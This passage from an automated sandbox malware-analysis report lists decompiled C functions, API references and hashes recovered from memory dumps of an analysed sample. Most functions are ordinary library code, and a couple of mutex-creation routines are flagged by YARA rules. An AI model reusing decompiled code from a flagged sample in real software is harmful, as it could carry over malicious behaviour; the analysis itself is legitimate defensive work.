                  0x0040131c
                  0x0040131f
                  0x00401329
                  0x00401329
                  0x00401331
                  0x00401336

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memcpy_s
                  • String ID:
                  • API String ID: 2001391462-0
                  • Opcode ID: af4fe0bf2a3b28bfa50e0f5dc0aec7f342693b3242073af976542bc3b97a567a
                  • Instruction ID: cb3531059e7c9241c49a6eff8f265f17319ee8308a504db105d52463e5de0ade
                  • Opcode Fuzzy Hash: af4fe0bf2a3b28bfa50e0f5dc0aec7f342693b3242073af976542bc3b97a567a
                  • Instruction Fuzzy Hash: 701186722006059FD305EF68C880D67B3A9FF8D314B10866EE65597351EB75E901CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405714, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00405714(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t29;
				void* _t32;
				void* _t34;
				intOrPtr _t41;
				void* _t56;
				intOrPtr* _t60;
				void* _t61;
				void* _t62;

				_t56 = __edx;
				_push(4);
				E00431A9B(E0044ABB9, __ebx, __edi, __esi);
				_t60 = __ecx;
				_t29 =  *((intOrPtr*)(_t62 + 0x14));
				_t44 =  *((intOrPtr*)(_t62 + 8));
				 *(_t62 + 0xc) =  *(_t62 + 0xc) | 0x40000000;
				 *((intOrPtr*)(__ecx + 0xa4)) =  *((intOrPtr*)(_t62 + 8));
				if(_t29 != 0) {
					_t41 =  *((intOrPtr*)(_t29 + 8));
					if(_t41 != 0) {
						 *((intOrPtr*)(__ecx + 0xe8)) =  *((intOrPtr*)(_t41 + 0x68));
						 *((intOrPtr*)(__ecx + 0x60)) =  *((intOrPtr*)(_t41 + 0x6c));
					}
				}
				E004014C0(_t62 - 0x10, _t56);
				 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
				E004014C0(_t62 + 8, _t56);
				 *(_t62 - 4) = 1;
				_t32 = E00402720(_t62 - 0x10, _t44);
				_t66 = _t32;
				if(_t32 != 0) {
					E0041B29E(_t62 + 8,  *((intOrPtr*)(_t62 - 0x10)), 0, 0xa);
				}
				_t34 =  *((intOrPtr*)( *_t60 + 0x194))(E00408C1D(_t44, _t60, _t66,  *(_t62 + 0xc), _t44),  *((intOrPtr*)(_t62 + 8)),  *(_t62 + 0xc), 0x46279c,  *((intOrPtr*)(_t62 + 0x10)),  *((intOrPtr*)(_t62 + 0x14)));
				_t61 = 0;
				if(_t34 != 0) {
					_t61 = 1;
				}
				E004010B0( *((intOrPtr*)(_t62 + 8)) + 0xfffffff0, _t56);
				E004010B0( *((intOrPtr*)(_t62 - 0x10)) + 0xfffffff0, _t56);
				return E00431B73(_t61);
			}











                  0x00405714
                  0x00405714
                  0x0040571b
                  0x00405720
                  0x00405722
                  0x00405725
                  0x00405728
                  0x0040572f
                  0x00405737
                  0x00405739
                  0x0040573e
                  0x00405743
                  0x0040574c
                  0x0040574c
                  0x0040573e
                  0x00405752
                  0x00405757
                  0x0040575e
                  0x00405767
                  0x0040576b
                  0x00405770
                  0x00405772
                  0x0040577f
                  0x0040577f
                  0x004057a5
                  0x004057ab
                  0x004057af
                  0x004057d1
                  0x004057d1
                  0x004057b7
                  0x004057c2
                  0x004057ce

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: 8a7514d54733c72b31dc1cced96e390b49405d59f9705daac9a0debe1872ddba
                  • Instruction ID: 4482dd84e3e1f924aac8e1e3bd257dd37003dfc8241748aaaf4d51b636d97771
                  • Opcode Fuzzy Hash: 8a7514d54733c72b31dc1cced96e390b49405d59f9705daac9a0debe1872ddba
                  • Instruction Fuzzy Hash: 88219F34600609EBDF00EF61C891FAF77A1EF04354F10452AF91A6B3E1DB749940DBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004247D7, Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E004247D7(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t26;
				intOrPtr* _t29;
				intOrPtr _t32;
				intOrPtr* _t39;
				intOrPtr _t41;
				void* _t43;
				void* _t44;

				_push(8);
				E00431ACE(E0044C0BF, __ebx, __edi, __esi);
				_t43 = __ecx;
				_t41 =  *((intOrPtr*)(_t44 + 8));
				if(_t41 != 0) {
					_t21 = E00424500(__ecx + 0x1c, _t41, __ecx, _t41);
					__eflags = _t21;
					if(_t21 == 0) {
						_t21 = E00424500(__ecx + 0x38, _t41, __ecx, _t41);
						__eflags = _t21;
						if(_t21 == 0) {
							_t23 = E0040444A(E0041FD51);
							 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
							_t36 = _t43 + 4;
							 *((intOrPtr*)(_t44 + 8)) = _t23;
							_t32 = E0042FBA4(_t43 + 4);
							__eflags = _t32;
							if(__eflags == 0) {
								E004063FE(_t32, _t36, _t41, _t43, __eflags);
							}
							 *((intOrPtr*)(_t43 + 0x14))(_t32);
							_t26 = E004246C7(_t32, _t43 + 0x38, _t41); // executed
							 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
							 *_t26 = _t32;
							E0040444A( *((intOrPtr*)(_t44 + 8)));
							_t29 =  *((intOrPtr*)(_t43 + 0x58)) + _t32;
							 *_t29 = _t41;
							__eflags =  *((intOrPtr*)(_t43 + 0x5c)) - 2;
							if( *((intOrPtr*)(_t43 + 0x5c)) == 2) {
								 *((intOrPtr*)(_t29 + 4)) = _t41;
							}
							_t21 = _t32;
						} else {
							_t39 =  *((intOrPtr*)(__ecx + 0x58)) + _t21;
							 *_t39 = _t41;
							__eflags =  *((intOrPtr*)(__ecx + 0x5c)) - 2;
							if( *((intOrPtr*)(__ecx + 0x5c)) == 2) {
								 *((intOrPtr*)(_t39 + 4)) = _t41;
							}
						}
					}
				} else {
					_t21 = 0;
				}
				return E00431B73(_t21);
			}












                  0x004247d7
                  0x004247de
                  0x004247e3
                  0x004247e5
                  0x004247ea
                  0x004247fa
                  0x004247ff
                  0x00424801
                  0x00424807
                  0x0042480c
                  0x0042480e
                  0x00424827
                  0x0042482c
                  0x00424830
                  0x00424833
                  0x0042483b
                  0x0042483d
                  0x0042483f
                  0x00424841
                  0x00424841
                  0x00424847
                  0x0042484e
                  0x00424856
                  0x0042485a
                  0x0042485c
                  0x00424864
                  0x00424866
                  0x00424868
                  0x0042486c
                  0x0042486e
                  0x0042486e
                  0x00424871
                  0x00424810
                  0x00424813
                  0x00424815
                  0x00424817
                  0x0042481b
                  0x0042481d
                  0x0042481d
                  0x0042481b
                  0x0042480e
                  0x004247ec
                  0x004247ec
                  0x004247ec
                  0x004247f3

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3_catch
                  • String ID:
                  • API String ID: 3886170330-0
                  • Opcode ID: 3e64b9e58c0a1709a153fe20580ef6c84a7755400a5b5cf31e2b7dbd7f5a3b76
                  • Instruction ID: 9197f78ff889db5bb5e608a4bb7d9c8daaa65afafdfa0369e7aef5d3225350aa
                  • Opcode Fuzzy Hash: 3e64b9e58c0a1709a153fe20580ef6c84a7755400a5b5cf31e2b7dbd7f5a3b76
                  • Instruction Fuzzy Hash: 5111C1747007509BC720EF26E94166AB7E0EFD1318B90853EE942976A1EB38E905CB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00412F2D, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E00412F2D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t19;
				intOrPtr _t24;
				intOrPtr* _t27;
				void* _t30;
				signed int* _t32;
				void* _t33;

				_t20 = __ebx;
				_push(4);
				E00431A9B(E0044B3B5, __ebx, __edi, __esi);
				_t30 = __ecx;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0x451568;
				_t32 = 0x451510;
				do {
					_t16 =  *(_t33 + 8) &  *_t32;
					if(( *(_t33 + 8) &  *_t32 & 0x0000f000) != 0) {
						_t5 = _t32 - 4; // 0xe81b
						_t16 = E00409833(_t30,  *_t5);
						_t36 = _t16;
						if(_t16 == 0) {
							_t24 = E00404461(_t36, 0xc4);
							 *((intOrPtr*)(_t33 - 0x10)) = _t24;
							 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
							_t37 = _t24;
							if(_t24 == 0) {
								_t19 = 0;
								__eflags = 0;
							} else {
								_t19 = E004133F9(_t20, _t24, _t30, _t32, _t37, 0);
							}
							_t9 = _t32 - 4; // 0xe81b
							_push( *_t9);
							 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
							_push( *_t32 | 0x56000000);
							_push(_t30);
							_t27 = _t19; // executed
							if( *((intOrPtr*)( *_t19 + 0x17c))() == 0) {
								_t16 = E0042280E(_t27);
							}
						}
					}
					_t32 =  &(_t32[2]);
				} while (_t32 < "iDockFrameWnd");
				return E00431B73(_t16);
			}









                  0x00412f2d
                  0x00412f2d
                  0x00412f34
                  0x00412f39
                  0x00412f3b
                  0x00412f45
                  0x00412f4a
                  0x00412f4d
                  0x00412f54
                  0x00412f56
                  0x00412f5b
                  0x00412f60
                  0x00412f62
                  0x00412f6f
                  0x00412f71
                  0x00412f74
                  0x00412f78
                  0x00412f7a
                  0x00412f85
                  0x00412f85
                  0x00412f7c
                  0x00412f7e
                  0x00412f7e
                  0x00412f87
                  0x00412f87
                  0x00412f8e
                  0x00412f98
                  0x00412f99
                  0x00412f9a
                  0x00412fa4
                  0x00412fa6
                  0x00412fa6
                  0x00412fa4
                  0x00412f62
                  0x00412fab
                  0x00412fae
                  0x00412fbb

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00412F34
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 004133F9: __EH_prolog3.LIBCMT ref: 00413400
                    • Part of subcall function 004133F9: SetRectEmpty.USER32(?), ref: 00413450
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$EmptyRect_malloc
                  • String ID:
                  • API String ID: 1428422903-0
                  • Opcode ID: 560d92e6b4d70705552a0594c27aa58a280f84e0716ba0d81986ee05fcab5f08
                  • Instruction ID: 60c52bf7d0ee18840f249dcd26fc2cf3d101614bcbc1bdb70064cbc4ec598c8f
                  • Opcode Fuzzy Hash: 560d92e6b4d70705552a0594c27aa58a280f84e0716ba0d81986ee05fcab5f08
                  • Instruction Fuzzy Hash: 66014C31700205ABEB18EF21C9167AEB2B0AF40304F00462FE856D73D1EBBC8D51965D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004134C3, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                  Download Yara Rule
                  C-Code - Quality: 44%
                  			E004134C3(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				struct tagRECT* _v12;
				char _v28;
				void* __ebx;
				void* __edi;
				struct tagRECT* _t17;
				void* _t19;
				void* _t20;
				intOrPtr* _t30;

				_t20 = __ecx;
				_v8 =  *(__ecx + 0xb0);
				_t17 = __ecx + 0xb4;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t30 = _a8;
				_v12 = _t17;
				 *(__ecx + 0xb0) = 0 |  *_t30 == 0x00000000;
				CopyRect(_t17, _t30 + 4);
				_t19 = E004217B7(_t20, _t20,  &_v28, _a4, _t30); // executed
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t20 + 0xb0) = _v8;
				return _t19;
			}












                  0x004134cc
                  0x004134d6
                  0x004134d9
                  0x004134e4
                  0x004134e5
                  0x004134e6
                  0x004134e9
                  0x004134ea
                  0x004134ef
                  0x004134f5
                  0x00413500
                  0x0041350c
                  0x0041351a
                  0x0041351b
                  0x0041351c
                  0x0041351d
                  0x00413520
                  0x00413528

                  APIs
                  • CopyRect.USER32 ref: 00413500
                    • Part of subcall function 004217B7: CopyRect.USER32 ref: 004217F2
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CopyRect
                  • String ID:
                  • API String ID: 1989077687-0
                  • Opcode ID: c4ecb7844e15528e9adc428bcb3507418fde64d8842dc894b86e224a8e58c7ec
                  • Instruction ID: cc5e8473d09934e6d7ff24cff4c9ac1d1a160460a925aeff77e35e501553fd45
                  • Opcode Fuzzy Hash: c4ecb7844e15528e9adc428bcb3507418fde64d8842dc894b86e224a8e58c7ec
                  • Instruction Fuzzy Hash: CC018176900704ABCB05DF99D8819DBBBBAFF46320F04017EFD0AAB201D7716A04CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00427502, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00427502(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				void* _t18;
				void* _t21;
				void* _t29;
				intOrPtr* _t34;
				void* _t35;

				_push(0x7c);
				E00431A9B(E0044C3A0, __ebx, __edi, __esi);
				_t16 =  *((intOrPtr*)(__ecx + 0x10));
				_t37 = _t16;
				if(_t16 != 0) {
					__eflags = _t16 - 1;
					_t31 =  *((intOrPtr*)(__ecx + 8));
					_t34 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 8));
					if(_t16 <= 1) {
						L5:
						_t18 =  *((intOrPtr*)( *_t34 + 0x80))(0, 1);
					} else {
						E00427285(_t35 - 0x88, __ecx + 4);
						 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
						_t21 = E00417C2D(__ebx, _t35 - 0x88, _t31, __edi, _t34, __eflags);
						 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t35 - 0x88)) = 0x4540cc;
						_t29 = _t35 - 0x88;
						__eflags = _t21 - 1;
						if(__eflags != 0) {
							_t18 = E004174FB(_t29, __edi, _t34, __eflags);
						} else {
							_t34 =  *((intOrPtr*)(_t35 - 0x10));
							E004174FB(_t29, __edi, _t34, __eflags);
							goto L5;
						}
					}
				} else {
					_push(0xffffffff);
					_push(_t16);
					_push(0xf104);
					_t18 = E00417146(__ebx, __edx, __edi, __esi, _t37);
				}
				return E00431B73(_t18);
			}









                  0x00427502
                  0x00427509
                  0x0042750e
                  0x00427511
                  0x00427513
                  0x00427524
                  0x00427527
                  0x0042752a
                  0x0042752d
                  0x0042756e
                  0x00427576
                  0x0042752f
                  0x00427539
                  0x0042753e
                  0x00427548
                  0x0042754d
                  0x00427551
                  0x0042755b
                  0x00427561
                  0x00427564
                  0x00427582
                  0x00427566
                  0x00427566
                  0x00427569
                  0x00000000
                  0x00427569
                  0x00427564
                  0x00427515
                  0x00427515
                  0x00427517
                  0x00427518
                  0x0042751d
                  0x0042751d
                  0x00427581

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427509
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                    • Part of subcall function 004174FB: __EH_prolog3.LIBCMT ref: 00417502
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: a2ba922fec3a509855610a124be86bd10da9b05b45ef600987d0f7498414911b
                  • Instruction ID: ca7fd307f2be72a3752cab3f0bceb8ec595584913dc78adcf506fcae19c16127
                  • Opcode Fuzzy Hash: a2ba922fec3a509855610a124be86bd10da9b05b45ef600987d0f7498414911b
                  • Instruction Fuzzy Hash: 66018830604121D7DB10EB15C881BADB330BF00318FA085DAF5569B1D1CF7DAEC58B49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040492C, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E0040492C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t25;
				struct HWND__* _t26;
				struct HWND__* _t28;
				void* _t35;
				void* _t36;

				_t36 = __eflags;
				_push(0x14);
				_push(0x45b0a0);
				E00431818(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t35 - 0x20)) = 0;
				_t25 = E0041EAD7( *((intOrPtr*)(E0041F363(0, __edi, __esi, _t36) + 0x80)), _t35 - 0x20);
				 *((intOrPtr*)(_t35 - 0x24)) = _t25;
				 *(_t35 - 0x1c) = 0;
				if(_t25 != 0) {
					 *((intOrPtr*)(_t35 - 4)) = 0;
					_t26 = CreateWindowExA( *(_t35 + 8),  *(_t35 + 0xc),  *(_t35 + 0x10),  *(_t35 + 0x14),  *(_t35 + 0x18),  *(_t35 + 0x1c),  *(_t35 + 0x20),  *(_t35 + 0x24),  *(_t35 + 0x28),  *(_t35 + 0x2c),  *(_t35 + 0x30),  *(_t35 + 0x34)); // executed
					 *(_t35 - 0x1c) = _t26;
					 *((intOrPtr*)(_t35 - 4)) = 0xfffffffe;
					E004049A6(0);
					_t28 =  *(_t35 - 0x1c);
				} else {
					_t28 = 0;
				}
				return E0043185D(_t28);
			}








                  0x0040492c
                  0x0040492c
                  0x0040492e
                  0x00404933
                  0x0040493a
                  0x0040494c
                  0x00404951
                  0x00404954
                  0x00404959
                  0x0040495f
                  0x00404986
                  0x0040498c
                  0x0040498f
                  0x00404996
                  0x0040499b
                  0x0040495b
                  0x0040495b
                  0x0040495b
                  0x004049a3

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateWindow
                  • String ID:
                  • API String ID: 716092398-0
                  • Opcode ID: 87500ae70025976bd9bfe52f2e7f2fc3dad7a477c7413be53226d0db631e77ba
                  • Instruction ID: 904469578396c1f20cc798ad30f63f77ac122cb8e5fcb475f2898160d20664ef
                  • Opcode Fuzzy Hash: 87500ae70025976bd9bfe52f2e7f2fc3dad7a477c7413be53226d0db631e77ba
                  • Instruction Fuzzy Hash: 2E01A57280020DAFCF41AFE5CD419DE7B71FF0C318F50452AFA6461161D3398961AF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023EA949, Relevance: 1.5, APIs: 1, Instructions: 31synchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 023EA989
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex
                  • String ID:
                  • API String ID: 1964310414-0
                  • Opcode ID: d86e5228b973533d9d0a2a61df652d1c506df3dd96736626f5cc50f93167a25d
                  • Instruction ID: 7ddbdf5ca4065607d7babb04aa46da9348532a31978025b93a7f56020f30b355
                  • Opcode Fuzzy Hash: d86e5228b973533d9d0a2a61df652d1c506df3dd96736626f5cc50f93167a25d
                  • Instruction Fuzzy Hash: D2F05CB1A4521457DF14666C7C01B6E369DDB04300F40042AF74EDA2C4EE20DC288BD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023EA8F0, Relevance: 1.5, APIs: 1, Instructions: 31synchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 023EA930
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex
                  • String ID:
                  • API String ID: 1964310414-0
                  • Opcode ID: 6e7bff0efdee80e7675404408f21c36bb995e0c9a54f259dd8b60cc84c7896ce
                  • Instruction ID: 5d1ad09cff5276258ec9b988f17c148f9ef861614366331cf2de2e94d96a275e
                  • Opcode Fuzzy Hash: 6e7bff0efdee80e7675404408f21c36bb995e0c9a54f259dd8b60cc84c7896ce
                  • Instruction Fuzzy Hash: B3F0EC72A4421457DF54666C7C05B6A36ADDB44704F40446AFB4ED62C4EE219C248BD5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F720, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F720(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* __esi;
				void* __ebp;
				void* _t10;
				long _t11;
				void* _t15;
				void* _t16;
				struct HWND__* _t18;

				if(_a8 != 0x360) {
					_t18 = _a4;
					_t10 = E0040EE68(_t15, _t16, _t18, __eflags, _t18);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						_t11 = DefWindowProcA(_t18, _a8, _a12, _a16);
						L6:
						return _t11;
					}
					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t18;
					if(__eflags != 0) {
						goto L5;
					}
					_t11 = E0040F62D(__ebx, _t16, _t18, __eflags, _t10, _t18, _a8, _a12, _a16); // executed
					goto L6;
				}
				return 1;
			}










                  0x0040f72c
                  0x0040f734
                  0x0040f738
                  0x0040f73d
                  0x0040f73f
                  0x0040f758
                  0x0040f762
                  0x0040f768
                  0x00000000
                  0x0040f768
                  0x0040f741
                  0x0040f744
                  0x00000000
                  0x00000000
                  0x0040f751
                  0x00000000
                  0x0040f751
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d53a845ea2ef5ea88e74bd1e4636f6f16ed949d4002cb73aa3a6d923430378a0
                  • Instruction ID: 2fdbec0b4a9ad72505348fdeb0c78ac9bbf9b9846fb0107a17cd17812a59923d
                  • Opcode Fuzzy Hash: d53a845ea2ef5ea88e74bd1e4636f6f16ed949d4002cb73aa3a6d923430378a0
                  • Instruction Fuzzy Hash: 6BF08232000119FBCF226FA18D048DB3BA9FF08351F008436FA14A2450C379C525DBAB
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00408BCA, Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00408BCA(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _t6;
				intOrPtr* _t16;

				_t16 = __ecx;
				_t6 = E0040ED96(__ecx, __eflags);
				if(_t6 != 0xffffffff) {
					_t6 =  *((intOrPtr*)( *_t16 + 0x174))(_a4, _a8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L1;
					}
					PostMessageA( *(_t16 + 0x20), 0x362, 0xe001, 0); // executed
					 *((intOrPtr*)( *_t16 + 0x150))(1);
					__eflags = 0;
					return 0;
				}
				L1:
				return _t6 | 0xffffffff;
			}





                  0x00408bd0
                  0x00408bd2
                  0x00408bda
                  0x00408beb
                  0x00408bf1
                  0x00408bf3
                  0x00000000
                  0x00000000
                  0x00408c04
                  0x00408c10
                  0x00408c16
                  0x00000000
                  0x00408c16
                  0x00408bdc
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 518b6bc56b42b1954addd32922aee5ef2c76ca411e4787bcdaa7cdbfe747cad4
                  • Instruction ID: 84aef6605057a435e7b508d2a4ac3e57ad12db9fb388b43368d2a12da25d0cd9
                  • Opcode Fuzzy Hash: 518b6bc56b42b1954addd32922aee5ef2c76ca411e4787bcdaa7cdbfe747cad4
                  • Instruction Fuzzy Hash: D1F0A030344600ABDB211B758C09F9A7BA5FF49731F110A3AF9A5AA2E1CAB6D8508A45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004074CB, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004074CB(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _t12;
				signed char _t14;
				signed char* _t17;

				_t17 = __ecx + 0x84;
				_t14 =  *_t17;
				 *_t17 = _t14 & 0xfffff0ff; // executed
				_t12 = E0042143D(__ecx, _a4); // executed
				 *_t17 = _t14;
				if((_t14 & 0x00000004) != 0) {
					_t12 = _a4;
					if(( *(_t12 + 0x18) & 0x00000001) == 0) {
						return InvalidateRect( *(__ecx + 0x20), 0, 1);
					}
				}
				return _t12;
			}






                  0x004074d8
                  0x004074de
                  0x004074e7
                  0x004074e9
                  0x004074ee
                  0x004074f3
                  0x004074f5
                  0x004074fc
                  0x00000000
                  0x00407505
                  0x004074fc
                  0x0040750f

                  APIs
